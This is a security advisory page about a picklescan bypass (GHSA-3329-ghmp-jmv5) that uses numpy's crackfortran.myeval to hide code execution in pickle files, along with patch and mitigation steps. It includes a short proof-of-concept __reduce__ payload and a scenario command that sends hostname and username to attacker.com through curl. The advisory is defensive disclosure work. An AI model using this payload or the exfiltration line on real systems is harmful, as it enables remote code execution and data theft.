GHSA-3329-ghmp-jmv5: picklescan: Code Injection enables RCE

GHSA-3329-ghmp-jmv5 HIGH
Published December 29, 2025
CISO Take

Picklescan, the de-facto ML model safety scanner, can be bypassed by crafting pickle payloads using numpy's internal `f2py.crackfortran.myeval` — any model your team cleared with picklescan < 0.0.33 must be considered untrusted and re-scanned. Patch to 0.0.33 immediately, re-validate all previously approved artifacts, and treat picklescan-passed models as unverified until confirmed on the patched version. False assurance is worse than no scanner: teams following security best practices are the specific target here.

Risk Assessment

HIGH. Exploitability is trivial — the PoC is four lines of Python requiring no special access or ML expertise. Impact is critical: arbitrary code execution on any system that loads a pickle file after it passes picklescan validation. The attack's most dangerous property is the false sense of security it creates: organizations that implemented picklescan as their security gate are now more exposed than those with no scanner, because they will load attacker-controlled artifacts with confidence. Broad exposure across MLOps pipelines, model marketplaces, and CI/CD automation that auto-validates contributed models.

Affected Systems

Package Ecosystem Vulnerable Range Patched
picklescan pip < 0.0.33 0.0.33
401 3 dependents Pushed 2mo ago 95% patched ~12d to patch Full package profile →

Do you use picklescan? You're affected.

Severity & Risk

CVSS 3.1
N/A
EPSS
N/A
Exploitation Status
No known exploitation
Sophistication
Moderate

Recommended Action

6 steps
  1. PATCH NOW

    Upgrade picklescan to >= 0.0.33 across all environments. Pin the version in requirements files.

  2. RE-SCAN ALL ARTIFACTS: Any model or pickle file validated by a vulnerable picklescan version must be re-scanned with the patched version before reuse. Do not grandfather existing approvals.

  3. SWITCH FORMATS WHERE POSSIBLE

    Migrate PyTorch model storage to safetensors format, which eliminates pickle deserialization risk entirely.

  4. SANDBOX MODEL LOADING

    Even with patched picklescan, load untrusted models in isolated environments with no network access and restricted syscalls (seccomp, gVisor).

  5. DETECTION

    Search repos and artifact stores for pickle files containing 'crackfortran' or 'myeval' strings. Audit CI/CD pipelines for picklescan version constraints and add dependency pinning.

  6. DEFENSE IN DEPTH

    Never rely solely on a single scanner — combine picklescan with hash verification against trusted sources and provenance attestation.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Art. 9 - Risk Management System Article 17 - Quality management system Article 9 - Risk management system
ISO 42001
A.6.1.6 - AI system supply chain security controls A.6.2.5 - AI supply chain management A.8.1 - AI system operational monitoring
NIST AI RMF
MANAGE-2.2 - Risk response and treatment MAP-5.1 - Likelihood of AI risks MEASURE 2.5 - AI system security and resilience testing
OWASP LLM Top 10
LLM03:2025 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is GHSA-3329-ghmp-jmv5?

Picklescan, the de-facto ML model safety scanner, can be bypassed by crafting pickle payloads using numpy's internal `f2py.crackfortran.myeval` — any model your team cleared with picklescan < 0.0.33 must be considered untrusted and re-scanned. Patch to 0.0.33 immediately, re-validate all previously approved artifacts, and treat picklescan-passed models as unverified until confirmed on the patched version. False assurance is worse than no scanner: teams following security best practices are the specific target here.

Is GHSA-3329-ghmp-jmv5 actively exploited?

No confirmed active exploitation of GHSA-3329-ghmp-jmv5 has been reported, but organizations should still patch proactively.

How to fix GHSA-3329-ghmp-jmv5?

1. PATCH NOW: Upgrade picklescan to >= 0.0.33 across all environments. Pin the version in requirements files. 2. RE-SCAN ALL ARTIFACTS: Any model or pickle file validated by a vulnerable picklescan version must be re-scanned with the patched version before reuse. Do not grandfather existing approvals. 3. SWITCH FORMATS WHERE POSSIBLE: Migrate PyTorch model storage to safetensors format, which eliminates pickle deserialization risk entirely. 4. SANDBOX MODEL LOADING: Even with patched picklescan, load untrusted models in isolated environments with no network access and restricted syscalls (seccomp, gVisor). 5. DETECTION: Search repos and artifact stores for pickle files containing 'crackfortran' or 'myeval' strings. Audit CI/CD pipelines for picklescan version constraints and add dependency pinning. 6. DEFENSE IN DEPTH: Never rely solely on a single scanner — combine picklescan with hash verification against trusted sources and provenance attestation.

What systems are affected by GHSA-3329-ghmp-jmv5?

This vulnerability affects the following AI/ML architecture patterns: training pipelines, model serving, MLOps CI/CD pipelines, model registries, data science notebooks.

What is the CVSS score for GHSA-3329-ghmp-jmv5?

No CVSS score has been assigned yet.

Technical Details

NVD Description

### Summary Picklescan uses numpy.f2py.crackfortran.myeval, which is a function in numpy to execute remote pickle files. ### Details The attack payload executes in the following steps: - First, the attacker crafts the payload by calling the numpy.f2py.crackfortran.myeval function in its reduce method - Then, when the victim checks whether the pickle file is safe by using the Picklescan library and this library doesn't detect any dangerous functions, they decide to use pickle.load() on this malicious pickle file, thus leading to remote code execution. ### PoC ``` class RCE: def __reduce__(self): from numpy.f2py.crackfortran import myeval return (myeval, ("os.system('ls')",)) ``` ### Impact Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models. Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded. Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects. ### Report by Pinji Chen (cpj24@mails.tsinghua.edu.cn) from the NISL lab (https://netsec.ccert.edu.cn/about) at Tsinghua University, Guanheng Liu (coolwind326@gmail.com).

Exploitation Scenario

Attacker publishes a PyTorch model to a public model hub or sends it directly to an ML engineering team via a convincing pull request or vendor submission. The model's pickle payload uses `numpy.f2py.crackfortran.myeval` in its `__reduce__` method to execute `os.system('curl -s http://attacker.com/$(hostname)/$(whoami)')`. The ML team runs picklescan as their standard validation step — it returns clean with no dangerous globals detected. Confident the model is safe, they load it in their training pipeline via `torch.load()`. On deserialization, the payload executes in the context of the training server: the attacker achieves RCE, potentially exfiltrating AWS credentials from instance metadata, model weights, proprietary training data, or establishing a reverse shell into the MLOps environment.

Timeline

Published
December 29, 2025
Last Modified
December 29, 2025
First Seen
March 24, 2026

Related Vulnerabilities